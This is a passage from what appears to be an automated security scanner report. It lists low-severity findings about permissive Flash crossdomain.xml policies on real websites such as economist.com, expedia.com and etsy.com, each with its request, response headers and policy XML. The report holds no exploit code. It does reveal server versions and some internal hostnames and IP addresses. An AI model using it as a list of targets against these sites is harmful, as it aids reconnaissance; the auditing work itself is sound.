<allow-access-from domain="*.ebay.com.hk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.in" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.ie" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.it" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.com.my" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.nl" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.nz" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.ph" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.pl" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.sg" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.es" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.ch" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.co.uk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebayrtm.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebaystatic.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.verve8media.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.westernfreight.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.ru" secure="false"/>
...[SNIP]...
7.239. http://www.economist.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.economist.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.economist.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 25 Mar 2011 15:58:35 GMT
ETag: "78092-267-49f50aa9600c0"
Cache-Control: max-age=1209600
Expires: Tue, 12 Apr 2011 08:20:55 GMT
X-ws: 9
Content-Type: text/xml
Content-Length: 615
Date: Sat, 02 Apr 2011 13:54:47 GMT
X-Varnish: 1459381536 1449341695
Age: 365632
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: HIT

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.economist.com"/>
<allow-access-from domain="*.*.economist.com"/>
<allow-access-from domain="*.zedo.com"/>
<allow-access-from domain="*.tangozebra.com"/>
<allow-access-from domain="*.*.doubleclick.net"/>
<allow-access-from domain="*.doubleclick.net"/>
<allow-access-from domain="*.doubleclick.com"/>
<allow-access-from domain="*.*.2mdn.net"/>
<allow-access-from domain="*.2mdn.net"/>
<allow-access-from domain="sandbox.dartmotif.com"/>
<allow-access-from domain="*.serving-sys.com"/>
...[SNIP]...
7.240. http://www.edmunds.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.edmunds.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.edmunds.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml; charset=ISO-8859-1
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="http://www.edmunds.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Expires: Sat, 02 Apr 2011 13:24:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:24:29 GMT
Content-Length: 2311
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<!-- http://www.edmunds.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="www.insideline.com"/>
<allow-access-from domain="*.insideline.com"/>
<allow-access-from domain="*.edmunds-media.com"/>
<allow-access-from domain="*.il.edmunds-media.com"/>
<allow-access-from domain="*.ed.edmunds-media.com"/>
...[SNIP]...
<allow-access-from domain="*.edmunds.com"/>
<allow-access-from domain="204.16.217.*"/>
...[SNIP]...
<allow-access-from domain="204.2.160.*"/>
...[SNIP]...
<allow-access-from domain="motifcdn.doubleclick.net"/>
...[SNIP]...
<allow-access-from domain="m.doubleclick.net"/>
...[SNIP]...
<allow-access-from domain="m2.doubleclick.net"/>
...[SNIP]...
<allow-access-from domain="m3.doubleclick.net"/>
...[SNIP]...
<allow-access-from domain="m.2mdn.net"/>
...[SNIP]...
<allow-access-from domain="m2.2mdn.net"/>
...[SNIP]...
<allow-access-from domain="betadfa.doubleclick.net"/>
...[SNIP]...
<allow-access-from domain="dfa.doubleclick.net"/>
...[SNIP]...
<allow-access-from domain="motifcdn2.doubleclick.net"/>
...[SNIP]...
<allow-access-from domain="ad.doubleclick.net"/>
...[SNIP]...
<allow-access-from domain="m1.2mdn.net"/>
...[SNIP]...
<allow-access-from domain="*.doubleclick.net"/>
...[SNIP]...
<allow-access-from domain="*.2mdn.net"/>
...[SNIP]...
<allow-access-from domain="cdn.edmunds.com*"/>
<allow-access-from domain="216.133.230.222"/>
<allow-access-from domain="216.133.230.225"/>
<allow-access-from domain="216.133.230.226"/>
<allow-access-from domain="216.133.230.227"/>
<allow-access-from domain="216.133.230.228"/>
<allow-access-from domain="216.133.230.229"/>
<allow-access-from domain="216.133.230.230"/>
<allow-access-from domain="216.133.230.231"/>
...[SNIP]...
<allow-access-from domain="*.brightcove.com"/>
...[SNIP]...
<allow-access-from domain="*.local"/>
<allow-access-from domain="*.localhost"/>
...[SNIP]...
7.241. http://www.eharmony.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eharmony.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.eharmony.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:38:39 GMT
Server: Apache/2.2.16 (Unix)
Last-Modified: Wed, 04 Aug 2010 23:07:16 GMT
ETag: "42f-48d077ea6f100"
Accept-Ranges: bytes
Content-Length: 1071
Cache-Control: max-age=900
Expires: Sat, 02 Apr 2011 13:53:39 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml
Set-Cookie: BIGipServerFront=3893301676.16671.0000; path=/
Set-Cookie: lbid=9d2a2466-11db-45be-62f2-cd84cad89a73;expires=Thu, 29-Sep-2011 13:38:39 GMT;path=/;domain=.eharmony.com;

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow
...[SNIP]...
<allow-access-from domain="static.eharmony.com" />
   <allow-access-from domain="*.eharmony.com" />
   <allow-access-from domain="*.eharmony.ca" />
   <allow-access-from domain="*.eharmony.com.au" />
   <allow-access-from domain="*.eharmony.co.uk" />
   <allow-access-from domain="*.eharmony.com.br" />
   <allow-access-from domain="*.compatiblepartners.net" />
...[SNIP]...
7.242. http://www.elle.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.elle.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.elle.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.14 (Unix) DAV/2 PHP/5.2.12 SVN/1.5.5
Last-Modified: Tue, 15 Mar 2011 04:36:57 GMT
ETag: "76ac0-db-49e7dfa764c40"
Accept-Ranges: bytes
Content-Length: 219
Content-Type: application/xml
Date: Sat, 02 Apr 2011 14:06:45 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<cross-domain-policy>
<allow-access-from domain="*.hfmus.com" />
<allow-access-from domain="hfm.checkm8.com" />
<allow-access-from domain="*.elle.com" />
</cro
...[SNIP]...
7.243. http://www.emedtv.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.emedtv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.emedtv.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:55 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: UT1=173.193.214.243.1301751595318080; path=/; expires=Tue, 30-Mar-21 13:39:55 GMT; domain=.emedtv.com
ETag: W/"213-1277746037000"
Last-Modified: Mon, 28 Jun 2010 17:27:17 GMT
Content-Length: 213
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.emedtv.com" />
</cross-d
...[SNIP]...
7.244. http://www.engadget.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.engadget.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.engadget.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:13:33 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 318
Keep-Alive: timeout=5, max=1000000
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.blogsmithmedia.com" />
<allow-access-from domain="*.unicast.com" />
...[SNIP]...
7.245. http://www.entertonement.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.entertonement.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.entertonement.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:09:54 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Tue, 07 Dec 2010 22:38:10 GMT
Accept-Ranges: bytes
Content-Length: 367
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.entertonement.com"/>
<allow-access-from domain="*.etmnt.com"/>
<allow-access-from domain="*.chir.ps"/>
...[SNIP]...
7.246. http://www.eonline.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eonline.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.eonline.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.2 (Unix) mod_jk/1.2.20 PHP/5.2.4
Accept-Ranges: bytes
Content-Length: 1462
Content-Type: application/xml
Date: Sat, 02 Apr 2011 13:43:46 GMT
Connection: close
Set-Cookie: edition=us; expires=Sun, 03-Apr-2011 13:43:46 GMT; path=/; domain=.eonline.com
Set-Cookie: adEdition=us; expires=Sun, 03-Apr-2011 13:43:46 GMT; path=/; domain=.eonline.com

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.72andsunny.com" />
<allow-access-from domain="*.aolcdn.com" />
<allow-access-from domain="*.att.net" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.casylum.com"/>
<allow-access-from domain="*.clearchannel.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.clearspring.com" />
<allow-access-from domain="*.creativeasylumdev.com" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.dvlabs.com" />
<allow-access-from domain="*.eentertainment.com"/>
<allow-access-from domain="*.eonline.com" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.klipmart.com" />
<allow-access-from domain="*.klipmart.com.edgesuite.net" />
<allow-access-from domain="*.kliptracker.com" />
<allow-access-from domain="*.kmshowcase.com" />
<allow-access-from domain="*.movenetworks.com" />
<allow-access-from domain="*.mystyle.com" />
<allow-access-from domain="*.oosocial.net" />
<allow-access-from domain="*.stylenetwork.com" />
<allow-access-from domain="*.wordpress.comcastnets.net" />
<allow-access-from domain="*.xlontech.net"/>
<allow-access-from domain="*.zugara.com" />
...[SNIP]...
7.247. http://www.epa.gov/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.epa.gov
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.epa.gov

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:12:52 GMT
Server: Apache
Last-Modified: Tue, 13 Jul 2010 15:52:00 GMT
ETag: "51b9349-115-48b46d9822800"
Accept-Ranges: bytes
Content-Length: 277
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.rtpnc.epa.gov"/>
<allow-access-from domain="*.epa.gov"/>
...[SNIP]...
7.248. http://www.etsy.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.etsy.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.etsy.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 27 Oct 2010 18:34:53 GMT
Accept-Ranges: bytes
Content-Length: 352
Content-Type: text/xml
Date: Sat, 02 Apr 2011 13:31:05 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="mas
...[SNIP]...
<allow-access-from domain="etsy.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.etsy.com" secure="false"/>
...[SNIP]...
7.249. http://www.evite.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.evite.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.evite.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 10 Sep 2009 01:53:50 GMT
ETag: "4e1c62-102-4732f789129a8"-gzip
Content-Type: application/xml
Vary: User-Agent
Expires: Sat, 02 Apr 2011 12:43:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 12:43:20 GMT
Content-Length: 258
Connection: close
Set-Cookie: evsessionid=66.235.125.15.1301748200664549; path=/; domain=.evite.com

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.evite.com"/>
<allow-access-from domain="*.yimg.com"/>
...[SNIP]...
7.250. http://www.expedia.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.expedia.com

Response

HTTP/1.0 200 OK
Content-Length: 1950
Content-Type: text/xml
Last-Modified: Tue, 27 Apr 2010 20:20:24 GMT
Accept-Ranges: bytes
ETag: "0b4401147e6ca1:0"
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Date: Sat, 02 Apr 2011 13:23:12 GMT
Connection: close

...<?xml version="1.0" ?>
<!DOCTYPE cross-domain-policy>
<cross-domain-policy>
<allow-access-from domain="*.expedia.ca" secure="true" />
<allow-access-from domain="*.expedia.co.uk" secure="true" />
...[SNIP]...
<allow-access-from domain="*.expedia.com" secure="true" />
...[SNIP]...
<allow-access-from domain="content.expedia.com" secure="true" />
...[SNIP]...
<allow-access-from domain="ads.expedia.com" secure="true" />
...[SNIP]...
<allow-access-from domain="media.expedia.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.expedia.com.au" secure="true" />
...[SNIP]...
<allow-access-from domain="*.expedia.com.jp" secure="true" />
...[SNIP]...
<allow-access-from domain="*.expedia.de" secure="true" />
...[SNIP]...
<allow-access-from domain="*.expedia.fr" secure="true" />
...[SNIP]...
<allow-access-from domain="*.expedia.it" secure="true" />
...[SNIP]...
<allow-access-from domain="*.expedia.nl" secure="true" />
...[SNIP]...
<allow-access-from domain=" www.expediacorporate.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="expediacorporate.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*expediacorporate.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.hotels.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.hotwire.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.tripadvisor.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.wwte.ca" secure="true" />
...[SNIP]...
<allow-access-from domain="*.wwte1.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.wwte4.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.wwte5.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.wwte7.com" secure="true" />
...[SNIP]...
<allow-access-from domain="labadssrv01" secure="true" />
...[SNIP]...
<allow-access-from domain="labadsol01" secure="true" />
...[SNIP]...
<allow-access-from domain="10.95.1.5" secure="true" />
...[SNIP]...
<allow-access-from domain="belwaweb01" secure="true" />
...[SNIP]...
<allow-access-from domain="*.unicast.com" secure="true" />
...[SNIP]...
7.251. http://www.factmonster.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.factmonster.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.factmonster.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:16:25 GMT
Server: Apache
Set-Cookie: Apache=173.193.214.243.1301753785065171; path=/; expires=Sun, 01-Apr-12 14:16:25 GMT
Last-Modified: Thu, 28 Oct 2010 21:07:40 GMT
ETag: "1cd-493b3bb70bf00"
Accept-Ranges: bytes
Content-Length: 461
Cache-Control: max-age=0
Expires: Sat, 02 Apr 2011 14:16:25 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.infoplease.com" />
<allow-access-from domain="infoplease.info" />
<allow-access-from domain="*.infoplease.info" />
<allow-access-from domain="i.infopls.com" />
<allow-access-from domain="*.familyeducation.com" />
...[SNIP]...
7.252. http://www.familyeducation.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.familyeducation.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.familyeducation.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 02 Apr 2011 13:56:22 GMT
Content-Type: text/xml
Accept-Ranges: bytes
Last-Modified: Mon, 23 Aug 2004 15:52:19 GMT
ETag: "f06edb2b2989c41:941"
Content-Length: 562

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="fen.com" />
<allow-access-from domain="*.fen.com" />
<allow-access-from domain="familyeducation.com" />
<allow-access-from domain="*.familyeducation.com" />
<allow-access-from domain="fekids.com" />
<allow-access-from domain="*.fekids.com" />
<allow-access-from domain="funbrain.com" />
<allow-access-from domain="*.funbrain.com" />
...[SNIP]...
7.253. http://www.famousfootwear.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.famousfootwear.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.famousfootwear.com

Response

HTTP/1.0 200 OK
Content-Length: 389
Content-Type: text/xml
Last-Modified: Fri, 12 Jun 2009 13:50:37 GMT
Accept-Ranges: bytes
ETag: "b9b92bc464ebc91:809f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:16:34 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
   <allow-access-from domain="*.interfacecms.com" />
   <allow-access-from domain="*.famousfootwear.com" />
...[SNIP]...
7.254. http://www.fandango.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fandango.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.fandango.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Content-Length: 1464
Content-Type: text/xml
Last-Modified: Tue, 28 Sep 2010 15:46:00 GMT
Accept-Ranges: bytes
ETag: "02c8f3f245fcb1:1e98"
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa OUR DELa STP BUS UNI COM NAV INT CNT STA"
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:26:51 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<site-control per
...[SNIP]...
<allow-access-from domain="comcast.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.comcast.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.comcastonline.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.att.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="media.pointroll.com"/>
<allow-access-from domain="www.pointroll.com"/>
<allow-access-from domain="submit.pointroll.com"/>
<allow-access-from domain="data.pointroll.com"/>
<allow-access-from domain="speed.pointroll.com"/>
<allow-access-from domain="mirror.pointroll.com"/>
<allow-access-from domain="mx.pointroll.com"/>
<allow-access-from domain="geo.pointroll.com"/>
<allow-access-from domain="ll.pointroll.com"/>
<allow-access-from domain="demo.pointroll.net"/>
<allow-access-from domain="clk.pointroll.com"/>
<allow-access-from domain="clients.pointroll.com"/>
<allow-access-from domain="images.fandango.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="a248.e.akamai.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="cdn1.eyewonder.com"/>
<allow-access-from domain="cdn.eyewonder.com"/>
...[SNIP]...
7.255. http://www.fanfiction.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fanfiction.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.fanfiction.net

Response

HTTP/1.0 200 OK
Server: LiteSpeed
Date: Sat, 02 Apr 2011 13:42:29 GMT
Connection: close
Accept-Ranges: bytes
ETag: "111-4d13ae92-0"
Last-Modified: Thu, 23 Dec 2010 20:18:26 GMT
Content-Type: application/xml
Cache-Control: max-age=604800
Expires: Sat, 09 Apr 2011 13:42:20 GMT
Content-Length: 273

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="*.fanfiction.net" />
...[SNIP]...
7.256. http://www.fanpop.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fanpop.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

